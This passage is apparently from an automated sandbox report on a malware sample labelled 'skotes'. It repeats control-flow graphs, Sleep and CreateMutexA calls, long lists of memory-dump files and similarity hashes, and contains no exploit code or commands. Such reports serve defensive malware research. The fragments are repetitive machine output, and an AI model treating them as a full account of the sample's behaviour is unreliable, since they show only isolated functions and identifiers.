                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 1464230837-3713388386
                                                                                                                                                                                            • Opcode ID: 5606e25dce115683645b994f536a492652db332742ae2bd3d2e1bfb31e0aef41
                                                                                                                                                                                            • Instruction ID: 8b7f6e24bd170d1549969aafd5489cef33c9fd5eb8814436b526d7231ed1a7ff
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5606e25dce115683645b994f536a492652db332742ae2bd3d2e1bfb31e0aef41
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D314831B802009BEB0CDBECDD897AEB763AF86310F244658E004EB3D5C7755AC08752

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 124 60a418-60a438 128 60a466-60a482 124->128 129 60a43a-60a446 124->129 130 60a4b0-60a4cf 128->130 131 60a484-60a490 128->131 132 60a448-60a456 129->132 133 60a45c-60a463 call 61d663 129->133 138 60a4d1-60a4dd 130->138 139 60a4fd-60a916 call 6180c0 130->139 136 60a492-60a4a0 131->136 137 60a4a6-60a4ad call 61d663 131->137 132->133 134 60a93f-60a949 call 636c6a * 2 132->134 133->128 155 60a94e 134->155 156 60a949 call 636c6a 134->156 136->134 136->137 137->130 144 60a4f3-60a4fa call 61d663 138->144 145 60a4df-60a4ed 138->145 144->139 145->134 145->144 157 60a953-60a994 Sleep CreateMutexA 155->157 158 60a94e call 636c6a 155->158 156->155 160 60a996-60a998 157->160 161 60a9a7-60a9a8 157->161 158->157 160->161 162 60a99a-60a9a5 160->162 162->161
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 1464230837-3713388386
                                                                                                                                                                                            • Opcode ID: d2b2312f88fc942a04f32b4194c222f486bdf4c09d85de14b2e248a5175b19ef
                                                                                                                                                                                            • Instruction ID: 3dd76f76c08a062e4cc55fd0e3cfae00b63e381578e1c27f06935dbf0852d8b2
                                                                                                                                                                                            • Opcode Fuzzy Hash: d2b2312f88fc942a04f32b4194c222f486bdf4c09d85de14b2e248a5175b19ef
                                                                                                                                                                                            • Instruction Fuzzy Hash: 08313931B902009BEB0C9BFCD989BAEB7A3EF82314F248618E414DB3D5D7B559C08756

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 164 60a54d-60a56d 168 60a59b-60a5b7 164->168 169 60a56f-60a57b 164->169 172 60a5e5-60a604 168->172 173 60a5b9-60a5c5 168->173 170 60a591-60a598 call 61d663 169->170 171 60a57d-60a58b 169->171 170->168 171->170 176 60a944-60a949 call 636c6a 171->176 174 60a632-60a916 call 6180c0 172->174 175 60a606-60a612 172->175 178 60a5c7-60a5d5 173->178 179 60a5db-60a5e2 call 61d663 173->179 181 60a614-60a622 175->181 182 60a628-60a62f call 61d663 175->182 192 60a94e 176->192 193 60a949 call 636c6a 176->193 178->176 178->179 179->172 181->176 181->182 182->174 195 60a953-60a994 Sleep CreateMutexA 192->195 196 60a94e call 636c6a 192->196 193->192 198 60a996-60a998 195->198 199 60a9a7-60a9a8 195->199 196->195 198->199 200 60a99a-60a9a5 198->200 200->199
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 1464230837-3713388386
                                                                                                                                                                                            • Opcode ID: 4636b18c6776cf5992d644ad89c0145520acabaaa4dbcd2f70ce131c44f47c4e
                                                                                                                                                                                            • Instruction ID: 340b887fd7ec26d8d6ba69d0a23577fc96638662a8ce1eb46734083b97f0657b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4636b18c6776cf5992d644ad89c0145520acabaaa4dbcd2f70ce131c44f47c4e
                                                                                                                                                                                            • Instruction Fuzzy Hash: E5313531B902049BEB0CDBBCDD89BAEB763EF86314F248618E414EB3D5C77599808756

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 202 60a682-60a6a2 206 60a6d0-60a6ec 202->206 207 60a6a4-60a6b0 202->207 210 60a71a-60a739 206->210 211 60a6ee-60a6fa 206->211 208 60a6b2-60a6c0 207->208 209 60a6c6-60a6cd call 61d663 207->209 208->209 212 60a949 208->212 209->206 216 60a767-60a916 call 6180c0 210->216 217 60a73b-60a747 210->217 214 60a710-60a717 call 61d663 211->214 215 60a6fc-60a70a 211->215 220 60a94e 212->220 221 60a949 call 636c6a 212->221 214->210 215->212 215->214 223 60a749-60a757 217->223 224 60a75d-60a764 call 61d663 217->224 228 60a953-60a994 Sleep CreateMutexA 220->228 229 60a94e call 636c6a 220->229 221->220 223->212 223->224 224->216 234 60a996-60a998 228->234 235 60a9a7-60a9a8 228->235 229->228 234->235 236 60a99a-60a9a5 234->236 236->235
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
